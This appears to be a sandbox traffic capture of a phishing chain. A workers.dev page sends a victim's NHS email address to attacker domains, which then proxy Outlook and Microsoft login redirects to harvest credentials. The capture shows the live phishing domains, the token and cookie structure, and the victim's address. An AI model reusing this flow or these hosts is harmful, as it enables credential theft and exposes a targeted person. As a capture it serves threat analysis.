47 57 50 31 74 37 70 46 76 Data Ascii: v_901eeac43f625e71=IzJemj20phzyzySz2l2hRvC04Kyoo0yvefJ2KyOPelp4Pyle3kjtTJyIjyjk4byzelzy6yj7kyueLhkAYy20yCel0yC2Wcydvv4hySpJHv7yoeyhCyMk2MyCJ2oRojh90ynv2by%2bZTvvMPyfSvy2KMI7ooyyKo0X0djZz10SBJGImzqeFX2emofOeykdBqJijlfTeyv7kM2yt$YOeMZJzjpriyTZiPHZ1GWP1t7pFv
2025-01-14 16:14:18 UTC	16384	OUT	Data Raw: 79 4e 79 4f 76 59 4b 43 42 34 71 7a 78 6b 4f 65 34 63 65 37 6c 33 6a 74 32 79 7a 59 79 45 2d 79 6a 79 4a 65 33 4a 6a 47 4a 55 79 79 70 79 50 79 31 65 32 37 6a 31 79 71 65 45 70 32 76 79 63 7a 66 79 79 4e 79 49 65 45 6b 32 76 79 54 65 32 75 47 76 4b 69 37 6a 61 7a 41 2b 6b 54 46 6c 59 4e 79 38 48 4a 44 34 6b 32 36 34 59 66 32 6e 37 49 79 4c 5a 32 31 4e 64 6c 4a 76 6c 54 65 4e 65 66 4a 79 71 79 43 4b 79 37 32 73 65 4a 79 6a 24 7a 4a 71 6f 4e 4d 79 66 76 79 42 62 50 75 51 57 53 24 43 55 78 6a 53 2b 4e 37 4d 62 54 53 50 76 5a 6d 47 65 74 6b 2b 6b 59 4f 41 59 4e 42 76 49 6b 32 52 79 57 79 68 2b 32 4b 32 77 46 72 59 32 44 74 64 79 43 4d 47 53 32 48 6b 75 6c 32 47 2b 68 65 66 4a 6a 6b 79 53 48 79 7a 34 77 53 79 48 59 72 6a 30 37 51 64 63 4a 6d 24 70 75 32 79 42 Data Ascii: yNyOvYKCB4qzxkOe4ce7l3jt2yzYyE-yjyJe3JjGJUyypyPy1e27j1yqeEp2vyczfyyNyIeEk2vyTe2uGvKi7jazA+kTFlYNy8HJD4k264Yf2n7IyLZ21NdlJvlTeNefJyqyCKy72seJyj$zJqoNMyfvyBbPuQWS$CUxjS+N7MbTSPvZmGetk+kYOAYNBvIk2RyWyh+2K2wFrY2DtdyCMGS2Hkul2G+hefJjkySHyz4wSyHYrj07QdcJm$pu2yB
2025-01-14 16:14:18 UTC	1778	OUT	Data Raw: 4d 57 49 33 39 6b 6a 7a 79 65 6c 54 70 32 48 68 42 37 4a 43 34 4c 57 2b 6b 32 7a 34 67 72 43 4a 52 47 51 75 46 61 79 66 79 34 35 24 51 65 68 32 4c 32 66 46 65 34 35 52 77 62 48 65 68 50 79 36 46 35 4e 59 6f 63 70 76 64 79 45 6f 43 65 70 39 4b 78 73 45 47 49 6d 47 78 49 42 74 46 35 76 49 4c 30 2b 37 48 65 4d 6b 79 55 76 67 33 66 45 6c 36 36 4a 70 32 63 34 68 36 64 4e 54 79 5a 24 46 36 74 47 76 6a 69 79 68 52 42 33 6a 37 36 47 33 78 7a 34 52 36 48 55 78 67 79 65 57 4b 2d 39 43 66 33 4d 47 65 4c 65 6e 71 79 65 30 59 78 30 4a 79 75 79 45 71 77 34 57 6e 79 69 2b 32 4a 55 35 76 32 50 79 71 79 42 37 33 78 4b 34 75 6a 62 2b 70 6a 42 46 70 62 78 42 24 61 32 33 39 31 62 43 24 79 62 66 7a 47 79 67 59 53 55 67 6b 34 78 65 6e 30 6a 72 66 53 42 7a 58 71 70 6a 5a 79 43 Data Ascii: MWI39kjzyelTp2HhB7JC4LW+k2z4grCJRGQuFayfy45$Qeh2L2fFe45RwbHehPy6F5NYocpvdyEoCep9KxsEGImGxIBtF5vIL0+7HeMkyUvg3fEl66Jp2c4h6dNTyZ$F6tGvjiyhRB3j76G3xz4R6HUxgyeWK-9Cf3MGeLenqye0Yx0JyuyEqw4Wnyi+2JU5v2PyqyB73xK4ujb+pjBFpbxB$a2391bC$ybfzGygYSUgk4xen0jrfSBzXqpjZyC
2025-01-14 16:14:18 UTC	1347	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 16:14:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4700 Connection: close cf-chl-out: 8cQBfhvy7katH/X7664fO8YkBhUX32PGoawSgnvUQkhFTxgFR4XBW3kAZ3x1mG3wq7GLgBS69pv40B9aNxzy8lihf16D0h9BC7g/DkGK/A0=$A8VtJ/DStJsp0y3bwX0l4g== cf-chl-out-s: r8cpqCtfkmoEmikaV/2mX3t0gyyxX6x6Pm5Cr7eZ5EKM5GM3yf7B+dzb0f/E9eNMC8syC7h0Um1z69n7UBugRP1PST3r0BgSQwJvHtax23hW98XOmr0ywtJTyTqocva9ijsyXL83Petb7Q4UgwGJ0WylfTEl+/U8rGTaC++oYykifRFC5OSWA6ssw79T1d9lH4df9S+CqcedDK4J7seiySKPyMWEgWH191IZR9ldoVJyR25RqAAIstuPUK+MJo6K0IF1VS4VdIS1VngcDLGvHgYcakQ9sZmpPHqzvKrT+fBhEl/P0LIrJUUJgoZiyH37EtX/pwZLoTKQ/hKOXRM8dWPFlMLWN3ML1fz1IaLqOL0mRCIy37b5BXqizJI0eeJr7RCGqf9E9hq5mfTuc7QyqMG5Q2BRs6+uMx2KZub7ss3xnn1OVsaco8HLfarnAegUOfXthOXscV181xZf5HDnmpK0R4ZZlvpOgUGrG25iYnU7eUXGPybYXl02zJ+aXr0vNdljyId6+BwqDwi5JXXHdMoZlP4x+JMWri3pUiGRjInXBCHCQLb3bu+YQSAX0qc5BIxhXoCO6O/XO1kskIMmI8VbYFasg0pYZD82cV/Hb3Hcm1p1Ntq9PXq4HIE3kQ65FUTu0CdX0byx9pn260oSKnslnuTaLgAY+8I+wZJuB8JFfqk0Rc8CiUZtwCpKvwcnAa/SgEblCr22uFOIG3rul7ZlWTOu4bRWnCgZfkw1YGEDmkbPHdK3hzlnEDKwLL8PPGXxnGqwQHpHoLVl4/OzF8epURK50IDxqMlV7VHIlW6uNakS03O/XNm0opUkJCg7GNtOIfzS3g94whXzfU42MGe0a7vXqRDNGowxNCek7PuNEI4wl8G5CbaN0Kglt3ecMY7gwlQNwHv03XyURv9TqaXNgWpU+ZjOwyXLtNnSPoCRNzuugnM9wud9iXE89yZi1yidQ3urtsAJNU7K3kq0gRL/FMg1QTmPLtHmFw88t6U=$uTmIy [TRUNCATED] Server: cloudflare
2025-01-14 16:14:18 UTC	62	IN	Data Raw: 43 46 2d 52 41 59 3a 20 39 30 31 65 65 62 31 35 62 39 31 38 30 66 38 63 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a Data Ascii: CF-RAY: 901eeb15b9180f8c-EWRalt-svc: h3=":443"; ma=86400
2025-01-14 16:14:18 UTC	1329	IN	Data Raw: 73 6f 39 33 64 4a 47 38 66 71 47 36 77 4a 4f 6e 78 4b 57 38 6d 38 37 4d 6f 71 36 7a 6a 4b 62 4c 77 4d 76 4b 32 4d 36 6c 78 74 37 55 77 4d 6e 41 7a 71 48 47 74 4b 2b 33 77 4b 4f 36 7a 4b 62 48 34 75 61 71 79 2b 6a 47 76 38 76 73 34 4e 50 77 79 38 2f 4e 74 39 2f 57 34 4f 75 38 32 65 54 6c 78 4e 73 48 36 75 76 58 32 38 66 47 79 51 48 39 38 66 45 42 41 39 4c 6a 79 39 50 53 45 65 6f 4b 41 64 6e 79 2b 77 48 57 37 64 67 6a 4a 4f 55 61 43 65 55 64 2f 67 37 6f 38 52 49 54 45 79 45 74 38 67 54 79 38 2f 55 62 46 79 6f 67 48 7a 44 34 49 66 30 54 4e 69 51 42 4a 79 6f 48 47 45 34 49 42 77 6c 46 4d 79 67 4d 49 45 31 57 57 46 49 31 4c 78 63 30 52 78 39 65 51 54 63 6b 52 47 41 67 55 56 46 63 59 79 6b 33 62 57 5a 62 62 69 38 2b 54 57 38 75 51 56 6b 34 63 30 30 7a 55 31 4a Data Ascii: so93dJG8fqG6wJOnxKW8m87Moq6zjKbLwMvK2M6lxt7UwMnAzqHGtK+3wKO6zKbH4uaqy+jGv8vs4NPwy8/Nt9/W4Ou82eTlxNsH6uvX28fGyQH98fEBA9Ljy9PSEeoKAdny+wHW7dgjJOUaCeUd/g7o8RITEyEt8gTy8/UbFyogHzD4If0TNiQBJyoHGE4IBwlFMygMIE1WWFI1Lxc0Rx9eQTckRGAgUVFcYyk3bWZbbi8+TW8uQVk4c00zU1J
2025-01-14 16:14:18 UTC	1369	IN	Data Raw: 70 64 66 66 6e 79 70 6a 4b 32 75 5a 71 4f 4a 63 33 35 30 6b 49 5a 33 70 35 57 4b 63 6e 53 59 63 5a 65 2f 76 49 7a 42 76 36 2b 5a 75 4c 75 6f 6d 59 4b 63 70 4a 75 61 7a 38 72 54 6e 64 61 74 6c 36 7a 53 6b 61 36 31 6b 37 4f 70 75 5a 7a 4b 72 64 2b 77 6f 72 4c 56 75 4a 79 72 78 4e 66 4b 38 4e 2f 79 73 50 4f 38 33 2f 4c 32 39 39 6a 53 75 75 72 7a 30 67 48 55 38 39 69 35 32 50 50 6c 31 4e 4c 41 33 67 33 55 41 4f 4c 50 2f 63 77 48 35 68 62 64 42 75 49 59 45 50 4d 57 48 52 67 48 37 66 6f 6a 2b 74 55 6c 34 41 44 32 4a 78 67 48 2b 78 63 67 42 66 73 66 38 42 49 46 4c 79 63 34 4f 53 4d 72 38 2f 45 57 46 69 6b 52 4d 51 34 79 46 77 51 46 48 2f 31 48 42 52 30 5a 54 51 31 45 55 45 46 50 43 69 49 76 4e 6c 55 6a 4d 42 41 72 4a 6c 64 50 58 79 74 67 48 44 6f 33 55 43 35 6c Data Ascii: pdffnypjK2uZqOJc350kIZ3p5WKcnSYcZe/vIzBv6+ZuLuomYKcpJuaz8rTndatl6zSka61k7OpuZzKrd+worLVuJyrxNfK8N/ysPO83/L299jSuurz0gHU89i52PPl1NLA3g3UAOLP/cwH5hbdBuIYEPMWHRgH7foj+tUl4AD2JxgH+xcgBfsf8BIFLyc4OSMr8/EWFikRMQ4yFwQFH/1HBR0ZTQ1EUEFPCiIvNlUjMBArJldPXytgHDo3UC5l
2025-01-14 16:14:18 UTC	1369	IN	Data Raw: 53 58 61 4b 69 76 71 6d 32 6f 71 4a 39 78 71 4c 43 6b 64 5a 36 35 71 48 75 74 76 36 53 42 66 38 47 65 77 61 71 64 76 61 33 45 70 4d 4b 49 73 61 7a 4a 79 70 43 6a 6f 36 44 58 7a 34 32 6b 6e 4c 65 71 33 72 6d 72 71 35 71 39 34 37 43 35 31 4c 54 65 33 74 62 48 78 61 71 73 72 73 54 71 74 4d 44 49 74 63 2f 55 38 62 6e 31 32 74 4c 58 73 39 6a 37 7a 76 66 35 32 41 67 49 41 64 34 4e 31 51 77 50 45 63 63 45 33 2b 2f 6c 39 51 77 57 32 64 72 53 37 2f 44 59 31 66 51 67 2f 65 34 53 38 51 4c 5a 33 67 6f 56 39 78 37 34 34 4f 34 66 38 42 41 43 2f 54 63 4b 4f 53 50 77 4a 76 73 36 46 68 62 78 39 76 64 44 44 7a 51 64 46 77 66 2b 4b 69 4d 43 4e 30 51 77 41 6b 42 45 54 52 38 2f 56 79 67 70 44 31 73 55 58 45 77 70 4c 78 59 34 55 45 4d 78 56 56 51 31 47 6c 68 6f 56 54 6b 33 5a Data Ascii: SXaKivqm2oqJ9xqLCkdZ65qHutv6SBf8Gewaqdva3EpMKIsazJypCjo6DXz42knLeq3rmrq5q947C51LTe3tbHxaqsrsTqtMDItc/U8bn12tLXs9j7zvf52AgIAd4N1QwPEccE3+/l9QwW2drS7/DY1fQg/e4S8QLZ3goV9x744O4f8BAC/TcKOSPwJvs6Fhbx9vdDDzQdFwf+KiMCN0QwAkBETR8/VygpD1sUXEwpLxY4UEMxVVQ1GlhoVTk3Z
2025-01-14 16:14:18 UTC	633	IN	Data Raw: 4a 71 34 71 6c 73 36 36 47 75 72 4a 77 6b 5a 65 64 6d 5a 58 42 66 4c 75 61 6e 33 2b 67 6d 61 57 6c 75 70 71 6e 76 36 65 54 7a 74 61 74 6f 73 69 50 72 4e 72 61 78 38 65 78 75 70 65 59 74 61 7a 58 74 4c 4b 65 77 63 43 35 77 39 2f 49 76 4d 66 49 73 62 37 75 73 36 37 47 74 36 2b 34 75 2b 6e 7a 30 4d 72 76 76 4f 75 35 38 2b 58 77 31 4e 2b 2f 79 4d 76 35 35 51 50 65 35 78 44 6a 33 42 51 51 37 42 63 59 43 4f 76 70 32 78 41 54 31 66 66 58 38 64 55 50 34 42 2f 35 45 76 30 44 39 42 37 31 42 51 49 49 4b 41 55 42 2f 51 59 69 37 51 51 43 44 67 6b 55 47 69 63 52 4d 66 67 79 46 6a 49 68 48 52 55 64 50 78 77 57 4f 68 70 45 49 51 63 4e 53 69 5a 55 52 78 41 6e 4d 69 6b 7a 56 6b 31 66 47 53 34 35 56 44 4d 7a 50 47 41 33 5a 79 63 2b 5a 47 77 6a 4a 44 39 44 4c 30 6c 4c 51 54 Data Ascii: Jq4qls66GurJwkZedmZXBfLuan3+gmaWlupqnv6eTztatosiPrNrax8exupeYtazXtLKewcC5w9/IvMfIsb7us67Gt6+4u+nz0MrvvOu58+Xw1N+/yMv55QPe5xDj3BQQ7BcYCOvp2xAT1ffX8dUP4B/5Ev0D9B71BQIIKAUB/QYi7QQCDgkUGicRMfgyFjIhHRUdPxwWOhpEIQcNSiZURxAnMikzVk1fGS45VDMzPGA3Zyc+ZGwjJD9DL0lLQT

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:14:19 UTC	598	OUT	GET /cdn-cgi/challenge-platform/h/b/flow/ov1/427550357:1736867636:Hrl0drLFPAO-Ioo5MdhbNq5JwydQFL51g-oXKOylUNU/901eeac43f625e71/wivrWOqgzMaSNvT90f5ud0goLwhNn4dJ1uoC04MkNso-1736871245-1.1.1.1-zygmDrQxBhbZIvDYFOJlI2b..poU6XvxCfcufR43J.N.teb5vickgSAhTQDFz74X HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 16:14:19 UTC	442	IN	HTTP/1.1 400 Bad Request Date: Tue, 14 Jan 2025 16:14:19 GMT Content-Type: application/json Content-Length: 14 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 cf-chl-out: btd/kT3jRsjwkzSZJVCQidJoqWNO7W/6rGXcDbi2Y0tz4AhwHDRddKgs7Zlq8GS8AlhZlMOXHGvO1WgMmiu5Sg==$lgzTKIlgHXK9nIHjV5UK/w== Server: cloudflare CF-RAY: 901eeb1a9b2d4334-EWR alt-svc: h3=":443"; ma=86400
2025-01-14 16:14:19 UTC	14	IN	Data Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d Data Ascii: {"err":100230}

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:14:19 UTC	556	OUT	OPTIONS /?ekpjrgyb&qrc=adrianmarsh@nhs.net HTTP/1.1 Host: bas-co.uk Connection: keep-alive Accept: / Access-Control-Request-Method: GET Access-Control-Request-Headers: qrc-auth Origin: https://5eedab40.shaullerica.workers.dev User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site Sec-Fetch-Dest: empty Referer: https://5eedab40.shaullerica.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 16:14:19 UTC	168	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Date: Tue, 14 Jan 2025 16:14:19 GMT Connection: close Transfer-Encoding: chunked
2025-01-14 16:14:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:14:20 UTC	740	OUT	GET /?ekpjrgyb&qrc=adrianmarsh@nhs.net HTTP/1.1 Host: bas-co.uk Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" accept: application/json qrc-auth: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: https://5eedab40.shaullerica.workers.dev Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://5eedab40.shaullerica.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 16:14:20 UTC	330	IN	HTTP/1.1 200 OK Set-Cookie: qPdM=hFN11MKGCHZs; path=/; samesite=none; secure; httponly Set-Cookie: qPdM.sig=kLeeELDLsoVcQ3j4mxqYtjIGLpY; path=/; samesite=none; secure; httponly content-type: application/json Access-Control-Allow-Origin: * Date: Tue, 14 Jan 2025 16:14:20 GMT Connection: close Transfer-Encoding: chunked
2025-01-14 16:14:20 UTC	327	IN	Data Raw: 31 33 62 0d 0a 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 67 69 61 6e 6e 69 6f 2e 63 6f 6d 2f 3f 64 61 74 61 58 58 30 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 31 63 6d 77 69 4f 69 4a 6f 64 48 52 77 63 7a 6f 76 4c 32 64 70 59 57 35 75 61 57 38 75 59 32 39 74 4c 79 49 73 49 6d 52 76 62 57 46 70 62 69 49 36 49 6d 64 70 59 57 35 75 61 57 38 75 59 32 39 74 49 69 77 69 61 32 56 35 49 6a 6f 69 61 45 5a 4f 4d 54 46 4e 53 30 64 44 53 46 70 7a 49 69 77 69 63 58 4a 6a 49 6a 6f 69 59 57 52 79 61 57 46 75 62 57 46 79 63 32 68 41 62 6d 68 7a 4c 6d 35 6c 64 43 49 73 49 6d 6c 68 64 43 49 36 4d 54 63 7a 4e 6a 67 33 4d 54 49 32 4d 43 77 69 5a 58 68 77 49 6a 6f 78 4e 7a 4d 32 4f 44 63 78 Data Ascii: 13b{"url":"https://giannio.com/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2dpYW5uaW8uY29tLyIsImRvbWFpbiI6ImdpYW5uaW8uY29tIiwia2V5IjoiaEZOMTFNS0dDSFpzIiwicXJjIjoiYWRyaWFubWFyc2hAbmhzLm5ldCIsImlhdCI6MTczNjg3MTI2MCwiZXhwIjoxNzM2ODcx

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:14:21 UTC	984	OUT	GET /?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2dpYW5uaW8uY29tLyIsImRvbWFpbiI6ImdpYW5uaW8uY29tIiwia2V5IjoiaEZOMTFNS0dDSFpzIiwicXJjIjoiYWRyaWFubWFyc2hAbmhzLm5ldCIsImlhdCI6MTczNjg3MTI2MCwiZXhwIjoxNzM2ODcxMzgwfQ.paqwP-ugkt_U78GOlPQHscluhYutvgpoUiV-DeuQCD8 HTTP/1.1 Host: giannio.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://5eedab40.shaullerica.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 16:14:21 UTC	308	IN	HTTP/1.1 302 Found Set-Cookie: qPdM=hFN11MKGCHZs; path=/; samesite=none; secure; httponly Set-Cookie: qPdM.sig=kLeeELDLsoVcQ3j4mxqYtjIGLpY; path=/; samesite=none; secure; httponly location: /?qrc=adrianmarsh%40nhs.net Date: Tue, 14 Jan 2025 16:14:21 GMT Connection: close Transfer-Encoding: chunked
2025-01-14 16:14:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:14:21 UTC	803	OUT	GET /?qrc=adrianmarsh%40nhs.net HTTP/1.1 Host: giannio.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://5eedab40.shaullerica.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=hFN11MKGCHZs; qPdM.sig=kLeeELDLsoVcQ3j4mxqYtjIGLpY
2025-01-14 16:14:21 UTC	1242	IN	HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache Pragma: no-cache Location: https://giannio.com/owa/?login_hint=adrianmarsh%40nhs.net Server: Microsoft-IIS/10.0 request-id: 0f50d93b-91b4-dbb0-2ff3-c8ca6b52897c Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-FEServer: AS4P195CA0029, AS4P195CA0029 X-RequestId: 7dd121e1-b006-42a5-8b9d-351188b0e359 Alt-Svc: h3=":443";ma=2592000,h3-29=":443";ma=2592000 X-FEProxyInfo: AS4P195CA0029.EURP195.PROD.OUTLOOK.COM X-FEEFZInfo: AMS MS-CV: O9lQD7SRsNsv88jKa1KJfA.0 X-Powered-By: ASP.NET Date: Tue, 14 Jan 2025 16:14:21 GMT Connection: close Content-Length: 0 Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:14:22 UTC	562	OUT	GET /?ekpjrgyb=c25456288a8a7517ca93e4a8f97f07e8ffdea4eee4fb00b0f1c081248990b79182ec9add4905e2a5a774c409eb37322dc2e2a3426df6098843e2cef1e62f150d&qrc=adrianmarsh%40nhs.net HTTP/1.1 Host: bas-co.uk Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=LbC8L2vWm8kx; qPdM.sig=FwhKLrv6OnWENxuBca-TJ7eMU7Y
2025-01-14 16:14:22 UTC	142	IN	HTTP/1.1 200 OK Content-Type: text/html;charset=UTF-8 Date: Tue, 14 Jan 2025 16:14:22 GMT Connection: close Transfer-Encoding: chunked
2025-01-14 16:14:22 UTC	3271	IN	Data Raw: 63 62 62 0d 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 2d 55 53 3e 3c 68 65 61 64 3e 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a 73 3f 6f 6e 6c 6f 61 64 3d 6f 6e 6c 6f 61 64 54 75 72 6e 73 74 69 6c 65 43 61 6c 6c 62 61 63 6b 22 3e 0a 3c 2f 73 63 72 69 70 74 3e 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d Data Ascii: cbb<!doctype html><html lang=en-US><head> <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script> <title>Just a moment...</title> <meta content="width=device-width,initial-scale=1" name=

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:14:22 UTC	814	OUT	GET /owa/?login_hint=adrianmarsh%40nhs.net HTTP/1.1 Host: giannio.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://5eedab40.shaullerica.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=hFN11MKGCHZs; qPdM.sig=kLeeELDLsoVcQ3j4mxqYtjIGLpY
2025-01-14 16:14:22 UTC	7950	IN	HTTP/1.1 302 Found content-length: 1355 Content-Type: text/html; charset=utf-8 Location: https://giannio.com/?phzt1wdp9=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1hZHJpYW5tYXJzaCU0MG5ocy5uZXQmY2xpZW50LXJlcXVlc3QtaWQ9N2VhZGM3MTktYzRiYy1jN2MzLTYwMDMtODY5NzE1YWU0ZjU2JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODcyNDY4MDYyNTQ4ODUwOC5mZDBmOTE1ZC01Y2IwLTQ2MjYtOTI2My1mMGE5NDFkYmI2ZTQmc3RhdGU9RGN0QkRvTWdFRUJSYU1fUzd0QVJoM0ZZTkI3RkRFVUtpY1ZFVFhyOXNuaF85N1ZTNnQ3Y0dnMHRhcUtSSjR2RVFOWWhzd1B1VW9Ua0J4ZU5ld2N3U0phTXR6U2FCT0p4aUNIUWlycTl6MzdfU1Q5di02ZlVKWmQ2dlNRZVJlcFhqak1fRUdvLXU3cGVmdw== Server: Microsoft-IIS/10.0 request-id: 7eadc719-c4bc-c7c3-6003-869715ae4f56 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-CalculatedFETarget: VI1P189CU001.internal.outlook.com X-BackEndHttpStatus: 302, 302 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ClientId=6D041578E8394D49BCAE840660191B27; expires=Wed, 14-Jan-2026 16:14:22 GMT; path=/;SameSite=None; secure Set-Cookie: ClientId=6D041578E8394D49BCAE840660191B27; expires=Wed, 14-Jan-2026 16:14:22 GMT; path=/;SameSite=None; secure Set-Cookie: OIDC=1; expires=Mon, 14-Jul-2025 16:14:22 GMT; path=/;SameSite=None; secure; HttpOnly 